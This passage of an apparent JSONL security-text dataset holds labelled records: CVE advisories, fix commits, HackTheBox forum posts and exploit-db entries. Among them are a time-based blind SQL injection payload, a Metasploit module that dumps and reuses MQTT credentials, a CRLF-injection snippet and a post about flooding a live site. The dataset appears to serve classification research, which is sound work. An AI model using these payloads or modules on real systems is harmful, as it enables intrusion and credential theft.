\n\nThe combination of the vulnerability and the server misconfiguration would allow an attacker to craft an HTTP request that executes the phpinfo() method. The attacker would then be able to get access to system information like configuration, modules, and environment variables and later on use the compromised secrets to access additional data.\n\n### Patches\n\nThis problem has been patched in dependencies of version 2.0.1.\n\n### Workarounds\n\nIf an immediate deployment with the updated vendor package is not available, you can perform the following temporary workarounds:\n- delete the vendor/microsoft/microsoft-graph-beta/tests/GetPhpInfo.php file\n- remove access to the /vendor directory will remove this vulnerability\n- disable the phpinfo function\n\n### References\nFor more information about the vulnerability and the patch, users can refer to the following sources: \n\n- https://nvd.nist.gov/vuln/detail/CVE-2023-49103\n- https://github.com/microsoftgraph/msgraph-beta-sdk-php/compare/2.0.0...2.0.1 \n- https://github.com/microsoftgraph/msgraph-sdk-php-core/compare/2.0.1...2.0.2 \n- https://github.com/microsoftgraph/msgraph-sdk-php/compare/1.109.0...1.109.1 \n- https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/ ", "source": "github_advisory", "timestamp": "2023-12-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "68e2b538c490a829188d", "text": "Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure\n\n# Exploit Title: Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure\n# Exploit Author: CraCkEr\n# Date: 25/07/2023\n# Vendor: Templatecookie\n# Vendor Homepage: https://templatecookie.com/\n# Software Link: https://templatecookie.com/demo/adlisting-classified-ads-script\n# Version: 2.14.0\n# Tested on: Windows 10 Pro\n# Impact: Sensitive Information Leakage\n# CVE: CVE-2023-4168\n\n\n## Description\n\nInformation disclosure issue in the redirect responses, When accessing any page on the website,\nSensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects.\n\n\n## Steps to Reproduce:\n\nWhen you visit any page on the website, like:\n\nhttps://website/ad-list?category=electronics\nhttps://website/ad-list-search?page=2\nhttps://website/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword=\n\nin the body page response there's information leakage for\n\n+---------------------+\ngoogle_map_key\napi_key\nauth_domain\nproject_id\nstorage_bucket\nmessaging_sender_id\napp_id\nmeasurement_id\n+---------------------+\n\n\nNote: The same information leaked, such as the API keys, server keys, and app ID, was added to the \"Firebase Push Notification Configuration\" in the Administration Panel.\n\nSettings of \"Firebase Push Notification Configuration\" in the Administration Panel, on this Path:\n\nhttps://website/push-notification (Login as Administrator)\n\n\n\n[-] Done", "source": "exploitdb", "timestamp": "2023-08-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0a2a736dfa33261fd698", "text": "Pimcore Unrestricted Upload of File with Dangerous Type\n\n[Severity: HIGH]\n\nIn Pimcore before 5.7.1, an attacker with limited privileges can bypass file-extension restrictions via a 256-character filename, as demonstrated by the failure of automatic renaming of .php to .php.txt for long filenames, a different vulnerability than CVE-2019-10867 and CVE-2019-16317.", "source": "github_advisory", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "798fcefcd8b6b6e717b1", "text": "CVE: CVE-2022-0122\n\n[{'lang': 'en', 'value': 'forge is vulnerable to URL Redirection to Untrusted Site'}]\n\nFix commit: Remove forge.util.parseUrl.\n\n- Switch URL parsing to the WHATWG URL Standard `URL` API.\n- Older browser or Node.js usage of related code might now require a URL\n polyfill.", "source": "cvefixes", "timestamp": "2022-01-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a973a0acea3020ab84d5", "text": "redis-py Race Condition vulnerability\n\n[Severity: MEDIUM]\n\nredis-py before 4.5.3, as used in ChatGPT and other products, leaves a connection open after canceling an async Redis command at an inopportune time (in the case of a pipeline operation), and can send response data to the client of an unrelated request in an off-by-one manner. The fixed versions for this CVE Record are 4.3.6, 4.4.3, and 4.5.3, but [are believed to be incomplete](https://github.com/redis/redis-py/issues/2665). CVE-2023-28859 has been assigned the issues caused by the incomplete fixes.", "source": "github_advisory", "timestamp": "2023-03-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e68b2003869a04a9aabd", "text": "There are six entries on the list with four different user names. You will be able to exclude two of them without further ado. So there are two possible answers left. If you start at the top, you won’t need a second try", "source": "hackthebox", "timestamp": "2022-07-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0762b71795bab2ed17f4", "text": "Best Online Course to Learn Python\n\nHi this is Palak Sharma. I have completed my engineering and lots of programming languages I learn from here. Python is also my favorite programming language however it was not part of our syllabus but I learn little bit about Python Programming Language from internet. Now I want to enhance my skills and my coding in this programming language, can anyone suggest some best online courses for learning Python Programming Language. Waiting for some positive responses. Thanks", "source": "go4expert", "timestamp": "2022-09-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4982ef87315c637b4a50", "text": "Nmap analysis on kali by being annonymous\n\nHello, I am new to the pen test. I have slight knowledge in network and system, title pro sys and network… so slight knowledge in routing, osi model and a bit of linux but I forgot a lot. -So I wanted to attempt a flood and penetration on a test site. which is weird to access the ip I ping the site and tracert I get an ip that goes from 96 to 97 on the penultimate byte during my floods. However when I type the ip on the internet browser I come across a cloudfare page (I imagine the cloud server that hosts the site?). So is it still effective when trying to flood via metasploit? The site remains very active so I imagine that there is a minimum of security (I had made one at a time via ufw 3 months ago for the anti back). -Furthermore, during an nmap it is sometimes noted that all the ports are in ignored state!!!??? but then how is it possible that the site is accessible on the internet!? For example I can have during my first nmap results of ports but during the second scan there is nothing more detected: ──(root㉿kali)-[~] └─# proxychains nmap 188.114.97.* [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.16 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-25 22:19 CEST Nmap scan report for 188.114.97.* Host is up (0.016s latency). Not shown: 996 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 443/tcp open https 8080/tcp open http-proxy 8443/tcp open https-alt Nmap done: 1 IP address (1 host up) scanned in 53.07 seconds ┌──(root㉿kali)-[~] └─# proxychains nmap -sV 188.114.97.* [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.16 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-25 22:21 CEST Nmap scan report for 188.114.97.$ Host is up (0.0020s latency). All 1000 scanned ports on 188.114.97.* are in ignored states. Not shown: 1000 filtered tcp ports (no-response) Service detection performed. Please report any incorrect results at Nmap OS/Service Fingerprint and Correction Submission Page . Nmap done: 1 IP address (1 host up) scanned in 11.49 seconds -Finally, it s weird, with “nmap -sV” without typing ‘‘proxychians’’ first on the other ip adress, i found service “tcpwrapped” but i didn’t found any vulnerabilitie on metasploit. Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-24 18:40 CEST Nmap scan report for davidduke.com (188.114.96. ) Host is up (0.013s latency). Other addresses for davidduke.com (not scanned): 188.114.97. **06:98c1:3120> Not shown: 997 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open tcpwrapped 443/tcp open tcpwrapped 8080/tcp open tcpwrapped Service detection performed. Please report any incorrect results at https://> Nmap done: 1 IP address (1 host up) scanned in 72.63 seconds Thanks. sorry english is not my mothertongue.", "source": "hackersploit", "timestamp": "2022-07-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a91e0120a14acff1d6cc", "text": ".NET Denial of Service Vulnerability\n\n[Severity: HIGH]\n\n# Microsoft Security Advisory CVE-2023-38178: .NET Denial of Service Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nA vulnerability exists in .NET Kestrel where a malicious client can bypass QUIC stream limit in HTTP/3 in both ASP.NET and .NET runtimes resulting in denial of service.\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/268\n\n### Mitigation factors\n\nMicrosoft has not identified any mitigating factors for this vulnerability.\n\n## Affected software\n\n* Any .NET 7.0 application running on .NET 7.0.9 or earlier.\n\nIf your application uses the following package versions, ensure you update to the latest version of .NET.\n\n\n### .NET 7\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.9 | 7.0.10\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.9 | 7.0.10\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.9 | 7.0.10\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.9 | 7.0.10\n[Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/ Microsoft.NetCore.App.Runtime.win-arm) | >= 7.0.0, <= 7.0.9 | 7.0.10\n[Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.9 | 7.0.10\n[Microsoft.NetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.9 | 7.0.10\n[Microsoft.NetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.9 | 7.0.10\n\n### .NET 6\n.NET 6 included HTTP/3 support as a [preview feature](https://learn.microsoft.com/dotnet/core/extensions/httpclient-http3#http3-support-in-net-6) , which requires specific opt-in code. If you are using HTTP/3 in .NET 6 you must update your application to .NET 7, where the feature is supported, to fix the vulnerability. Future versions of .NET will disable the preview feature entirely.\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\n* To fix the issue please install the latest version of .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.\n* To fix this issue on Linux, please update `libmsquic` to 2.2+\n* If you are using one of the affected packages, please update to the patched version listed above.\n* If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following;\n\n```\n.NET Core SDK (reflecting any global.json):\n\n Version: 7.0.400\n Commit: 8473146e7d\n\nRuntime Environment:\n\n OS Name: Windows\n OS Version: 10.0.18363\n OS Platform: Windows\n RID: win10-x64\n Base Path: C:\\Program Files\\dotnet\\sdk\\6.0.300\\\n\nHost (useful for support):\n\n Version: 7.0.10\n Commit: 8473146e7d\n\n.NET Core SDKs installed:\n\n 7.0.400 [C:\\Program Files\\dotnet\\sdk]\n", "source": "github_advisory", "timestamp": "2023-08-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9dbfa3c4430b976654ed", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0673, CVE-2020-0674, CVE-2020-0711, CVE-2020-0712, CVE-2020-0713, CVE-2020-0767.", "source": "github_advisory", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ae4b1ccf4367eaffd159", "text": "CVE: CVE-2022-34132\n\n[{'lang': 'en', 'value': 'Benjamin BALET Jorani v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at application/controllers/Leaves.php.'}]\n\nFix commit: BF:Prevent SQL injection fix #369", "source": "cvefixes", "timestamp": "2022-06-28", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ef723f1e203f4921e0d4", "text": "CVE: CVE-2022-0574\n\n[{'lang': 'en', 'value': 'Improper Access Control in GitHub repository publify/publify prior to 9.2.8.'}]\n\nFix commit: Do not allow comments on Article if not published", "source": "cvefixes", "timestamp": "2022-05-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "581437bada02bb445c69", "text": "CVE: CVE-2022-0831\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.3.3.'}]\n\nFix commit: escaping 'key' custom property field in elements", "source": "cvefixes", "timestamp": "2022-03-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "adc2b9435b78c2f9163f", "text": "I don’t know why but it’s not advisable to use “${ #var }”, using other methods to obtain the length of $var it worked perfectly!!!", "source": "hackthebox", "timestamp": "2023-01-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "83ce4ec7777c008ada86", "text": "Records cannot be updated because it is a read-only format. It is connection-oriented; whenever data is retrieved from a database, a connection is required. Since it's in read-only format, we can't update it. Data Reader is used to read data from databases, and its connection-oriented architecture is read-only while fetching data from databases. When compared to a dataset, a data reader will retrieve the data quite quickly. Typically, we'll connect data to a data reader using an Execute Reader object. Where as Data Table represents a single table in the database It has rows and columns. There is no much difference between dataset and data table, Dataset is simply the collection of data tables. A single database table is represented by a Data Table. It has columns and rows. Datasets and data tables are nearly identical; a dataset is essentially a collection of data tables.", "source": "go4expert", "timestamp": "2023-02-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ede6a8d3fcbce5b6e46e", "text": "ChakraCore vulnerable to remote code execution\n\n[Severity: HIGH]\n\nChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". `Op_MaxInAnArray` and `Op_MinInAnArray` can explicitly call user defined JavaScript functions, potentially leading to remote code execution.\n\nThis CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d5bcbbd852ffa6494418", "text": "Just so its 100% clear: The question regarding the name of the image file (w/ hint: file.jpg) utilizes the Wireshark-Lab-2.pcap file. The question regarding the name of the user who is acting maliciously utilizes the packet capture data from the target device you spawn and then rdp into the capture VM. Do not mix them up, and be aware that these two questions use different resources for their answer.", "source": "hackthebox", "timestamp": "2022-09-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9c21340510c93d5d7288", "text": "Something that I found was to go with the hint provided for the first question in the service login. I ran my possible username through Metasploit and got a correct hit on the username. First is that I was able to get the last challenge in under 2 hrs. Use First Name and Last Name only when generating the user list. Use Fist Name and Last Name when generating the Password list and include 1337 When in look at the Netstat and you will see something missing. Never overlook the obvious", "source": "hackthebox", "timestamp": "2022-09-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d23c9c74b4a81ce09f04", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nChakraCore and Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows remote code execution, due to how the Chakra scripting engine handles objects in memory, aka \"Chakra Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2018-0872, CVE-2018-0873, CVE-2018-0930, CVE-2018-0931, CVE-2018-0933, CVE-2018-0934, CVE-2018-0936, and CVE-2018-0937.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b3b74ce24c6bca098570", "text": "Monitor mode on a HP EliteBook by defualt\n\nBefore I start this post i just wanna say this isn’t an issue with Parrot OS itself, just something weird. I recently dual booted my HP EliteBook 850 G7 Notebook with parrot OS KDE. All was fine until I decided I wanted to do some monitor mode scanning with my adapter. I have an Ar9271 adapter I got off Ali Express but just for fun I wanted to see if I could set my internal wifi card to moniter mode. I used airmon-ng to do this and viola! it did actually set into monitor mode. I tried scaning my network using airodump-ng and tested it using the cmd aireplay-ng --test, that also worked fine. All this time I didn’t have my external card plugged in, so I was sure I wasn’t accidently scanning off that. My question is, how tf is my internal wifi card able to bet set in monitor mode without any patch’s or drivers. I’v put my laptop model in the paragraph above, and I could not find anyone who has experienced this. So is this weird or does everyone have this but no one uses it?", "source": "parrotsec", "timestamp": "2022-02-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ee5141883f314aca4d98", "text": "CVE: CVE-2022-29252\n\n[{'lang': 'en', 'value': 'XWiki Platform Wiki UI Main Wiki is a package for managing subwikis. Starting with version 5.3-milestone-2, XWiki Platform Wiki UI Main Wiki contains a possible cross-site scripting vector in the `WikiManager.JoinWiki ` wiki page related to the \"requestJoin\" field. The issue is patched in versions 12.10.11, 14.0-rc-1, 13.4.7, and 13.10.3. The easiest available workaround is to edit the wiki page `WikiManager.JoinWiki` (with wiki editor) according to the suggestion provided in the GitHub Security Advisory.'}]\n\nFix commit: XWIKI-19292: Fix bad escaping", "source": "cvefixes", "timestamp": "2022-05-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7b5852f53450c1109359", "text": "If you were able to get flag4 use that shell to upgrade to an interactive shell as others mentioned. Or use “Meterpreter”, and look for other local exploits provided by “msf”.", "source": "hackthebox", "timestamp": "2023-02-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a4d06bd1b8bf59254da6", "text": "CVE: CVE-2022-21728\n\n[{'lang': 'en', 'value': \"Tensorflow is an Open Source Machine Learning Framework. The implementation of shape inference for `ReverseSequence` does not fully validate the value of `batch_dim` and can result in a heap OOB read. There is a check to make sure the value of `batch_dim` does not go over the rank of the input, but there is no check for negative values. Negative dimensions are allowed in some cases to mimic Python's negative indexing (i.e., indexing from the end of the array), however if the value is too negative then the implementation of `Dim` would access elements before the start of an array. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.\"}]\n\nFix commit: Fix out of bound error in ReverseSequence Op shape function\n\nPiperOrigin-RevId: 411896080\nChange-Id: I7e59a38e2f960886edf2b6c54ed5a84e86a9b193", "source": "cvefixes", "timestamp": "2022-02-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "3a01de15be917dd5467f", "text": "CVE: CVE-2022-1699\n\n[{'lang': 'en', 'value': 'Uncontrolled Resource Consumption in GitHub repository causefx/organizr prior to 2.1.2000. This vulnerability can be abused by doing a DDoS attack for which genuine users will not able to access resources/applications.'}]\n\nFix commit: fix more lengths of user inputs", "source": "cvefixes", "timestamp": "2022-05-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "4234a3d5506cdfef17ef", "text": "Hospital Management Startup 1.0 - 'Multiple' SQLi\n\n# Exploit Title: Hospital Management Startup 1.0 - 'loginid' SQLi\n# Exploit Author: nu11secur1ty\n# Date: 02.10.2022\n# Vendor: https://github.com/kabirkhyrul\n# Software: https://github.com/kabirkhyrul/HMS\n# CVE-2022-23366\n\n# Description:\nThe loginid and password parameters from Hospital Management Startup\n1.0 appear to be vulnerable to SQL injection attacks.\nThe attacker can retrieve all information from the administrator\naccount of the system and he can use the information for malicious\npurposes!\nWARNING: If this is in some external domain, or some subdomain, or\ninternal, this will be extremely dangerous!\n\nStatus: CRITICAL\n\n\n[+] Payloads:\n\n```mysql\n---\nParameter: loginid (POST)\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: loginid=hackedpassword=hacked' or '6681'='6681' AND\n(SELECT 1959 FROM (SELECT(SLEEP(3)))PuyC) AND\n'sDHP'='sDHP&rememberme=on&submit=Login\n---\n\n```\n# Reproduce:\nhttps://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-23366", "source": "exploitdb", "timestamp": "2022-02-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "520133a0401451c88983", "text": "By following the password requirements and applying RegEx-Filters on Rockyou30, not a single compliant password is left in this list. I am supposed to use Rockyou30 for this task, but this password list is not consistent with these password policies.", "source": "hackthebox", "timestamp": "2022-01-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "88e9488d3614fab8519a", "text": "Jetty Directory Traversal Vulnerability\n\n[Severity: MEDIUM]\n\nDirectory traversal vulnerability in jetty 6.0.x (jetty6) beta16 allows remote attackers to read arbitrary files via a `%2e%2e%5c` (encoded `../`) in the URL. NOTE: this might be the same issue as CVE-2005-3747.", "source": "github_advisory", "timestamp": "2022-05-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "1454eb29f20206913e6e", "text": "Servisnet Tessa - MQTT Credentials Dump (Unauthenticated) (Metasploit)\n\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/mqtt'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::MQTT\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Servisnet Tessa - MQTT Credentials Dump (Unauthenticated) (Metasploit)',\n 'Description' => %q(\n This module exploits MQTT creds dump vulnerability in Servisnet Tessa.\n\t\tThe app.js is publicly available which acts as the backend of the application.\n By exposing a default value for the \"Authorization\" HTTP header,\n it is possible to make unauthenticated requests to some areas of the application.\n Even MQTT(Message Queuing Telemetry Transport) protocol connection information can be obtained with this method.\n A new admin user can be added to the database with this header obtained in the source code.\n\n The module tries to log in to the MQTT service with the credentials it has obtained,\n and reflects the response it receives from the service.\n\n ),\n 'References' =>\n [\n [ 'CVE', 'CVE-2022-22833' ],\n [ 'URL', 'https://pentest.com.tr/exploits/Servisnet-Tessa-MQTT-Credentials-Dump-Unauthenticated.html' ],\n [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]\n ],\n 'Author' =>\n [\n 'Özkan Mustafa AKKUŞ ' # Discovery & PoC & MSF Module @ehakkus\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => \"Dec 22 2021\",\n 'DefaultOptions' =>\n {\n 'RPORT' => 443,\n 'SSL' => true\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path for application', '/'])\n ])\n end\n # split strings to salt\n def split(data, string_to_split)\n word = data.scan(/\"#{string_to_split}\"\\] = \"([\\S\\s]*?)\"/)\n string = word.split('\"]').join('').split('[\"').join('')\n return string\n end\n\n def check_mqtt\n res = send_request_cgi({\n # default.a.get( check\n 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),\n\t 'method' => 'GET'\n })\n\n if res && res.code == 200 && res.body =~ /connectionMQTT/\n data = res.body\n #word = data.scan(/\"#{string_to_split}\"\\] = \"([\\S\\s]*?)\"/)\n mqtt_host = data.scan(/host: '([\\S\\s]*?)'/)[0][0]\n rhost = mqtt_host.split('mqtts://').join('')\n print_status(\"MQTT Host: #{mqtt_host}\")\n mqtt_port = data.scan(/port: ([\\S\\s]*?),/)[0][0]\n print_status(\"MQTT Port: #{mqtt_port}\")\n mqtt_end = data.scan(/endpoint: '([\\S\\s]*?)'/)[0][0]\n print_status(\"MQTT Endpoint: #{mqtt_end}\")\n mqtt_cl = data.scan(/clientId: '([\\S\\s]*?)'/)[0][0]\n print_status(\"MQTT clientId: #{mqtt_cl}\")\n mqtt_usr = data.scan(/username: '([\\S\\s]*?)'/)[1][0]\n print_status(\"MQTT username: #{mqtt_usr}\")\n mqtt_pass = data.scan(/password: '([\\S\\s]*?)'/)[1][0]\n print_status(\"MQTT password: #{mqtt_pass}\")\n\n print_status(\"##### Starting MQTT login sweep #####\")\n\n # Removed brute force materials that can be included for the collection.\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n password: mqtt_pass,\n username: mqtt_usr\n )\n # this definition already exists in \"auxiliary/scanner/mqtt/connect\". Moved into exploit.\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::MQTT.new(\n host: rhost,\n port: mqtt_port,\n read_timeout: datastore['READ_TIMEOUT'],\n client_id: client_id,\n proxies: datastore['PROXIES'],\n cred_details: cred_col", "source": "exploitdb", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f8b5589b6b428183aeff", "text": "f there is still an opening, I’d like a chance to join. I have been doing most of this stuff solo, would love to get more involved. DM me if this is still available.", "source": "hackthebox", "timestamp": "2022-09-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7e4d769c2b09e146af22", "text": "CVE: CVE-2022-1173\n\n[{'lang': 'en', 'value': 'stored xss in GitHub repository getgrav/grav prior to 1.7.33.'}]\n\nFix commit: Fixed XSS check not detecting onX events without quotes", "source": "cvefixes", "timestamp": "2022-04-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f838a02a1f240604a0e9", "text": "MoinMoin Access Restrictions Bypassed due to improper ACL enforcement\n\n[Severity: HIGH]\n\nMoinMoin 1.6.2 and 1.7 does not properly enforce ACL checks when acl_hierarchic is set to True, which might allow remote attackers to bypass intended access restrictions, a different vulnerability than CVE-2008-1937.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "04d0dfc2db0634114074", "text": "Welcome to the forums, why Linux fails to install [generic answer] Corrupt download [did you check the SHA sum], Bad burn to the pen-drive[ Rufus has not been playing well with all Linux for a while, try Balena Etcher] Defective pen-drive [use a good quality branded drive formatted XFats]", "source": "parrotsec", "timestamp": "2023-01-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "6a93bd47bde882a10426", "text": "CVE: CVE-2022-24761\n\n[{'lang': 'en', 'value': \"Waitress is a Web Server Gateway Interface server for Python 2 and 3. When using Waitress versions 2.1.0 and prior behind a proxy that does not properly validate the incoming HTTP request matches the RFC7230 standard, Waitress and the frontend proxy may disagree on where one request starts and where it ends. This would allow requests to be smuggled via the front-end proxy to waitress and later behavior. There are two classes of vulnerability that may lead to request smuggling that are addressed by this advisory: The use of Python's `int()` to parse strings into integers, leading to `+10` to be parsed as `10`, or `0x01` to be parsed as `1`, where as the standard specifies that the string should contain only digits or hex digits; and Waitress does not support chunk extensions, however it was discarding them without validating that they did not contain illegal characters. This vulnerability has been patched in Waitress 2.1.1. A workaround is available. When deploying a proxy in front of waitress, turning on any and all functionality to make sure that the request matches the RFC7230 standard. Certain proxy servers may not have this functionality though and users are encouraged to upgrade to the latest version of waitress instead.\"}]\n\nFix commit: Merge pull request from GHSA-4f7p-27jc-3c36\n\nFix for HTTP request smuggling due to incorrect validation", "source": "cvefixes", "timestamp": "2022-03-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "857570ff769f192e4e85", "text": "Simple web-based relational database system\n\nHello all, We have just launched a startup. Now, we are looking for a simple web-based relational database system where we can easily add tables and connect them to one another through foreign keys. For example, we would want to create a suppliers database in which we could perform a query such as \"show me 1. all suppliers 2. for a certain product type 3. which is based in a certain region 4. and offers the product type within a certain price range\". We are a team of five which means the database should be accessible for 5 people through a web interface. We know the basics of database modeling. But unfortunately, none of us is experienced in writing (my)SQL code. Thus, we would wish to find a system that comes with a tool-based development environment. Eventually, our budget is limited and we, therefore, would prefer a cheap system over an expensive one. We would appreciate any ideas from you", "source": "go4expert", "timestamp": "2022-03-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "188f0a56dbf183c0a75e", "text": "So the command kept timing out for me. I know this is probably a rookie mistake, but for anyone else who’s struggling with this, I eventually got it to work using ssh://SERVER_IP:SERVER_PORT instead of ssh://SERVER_IP:22 as described in the HTB guides (unless I misread it).", "source": "hackthebox", "timestamp": "2022-11-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4a728b234c3951c3b3fc", "text": "CVE: CVE-2022-1381\n\n[{'lang': 'en', 'value': 'global heap buffer overflow in skip_range in GitHub repository vim/vim prior to 8.2.4763. This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution'}]\n\nFix commit: patch 8.2.4763: using invalid pointer with \"V:\" in Ex mode\n\nProblem: Using invalid pointer with \"V:\" in Ex mode.\nSolution: Correctly handle the command being changed to \"+\".", "source": "cvefixes", "timestamp": "2022-04-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8a29b951ab7f6cbf75cf", "text": "undici before v5.8.0 vulnerable to CRLF injection in request headers\n\n[Severity: MEDIUM]\n\n### Impact\n\nIt is possible to inject CRLF sequences into request headers in Undici.\n\n```js\nconst undici = require('undici')\n\nconst response = undici.request(\"http://127.0.0.1:1000\", {\n headers: {'a': \"\\r\\nb\"}\n})\n```\n\nThe same applies to `path` and `method`\n\n### Patches\n\nUpdate to v5.8.0\n\n### Workarounds\n\nSanitize all HTTP 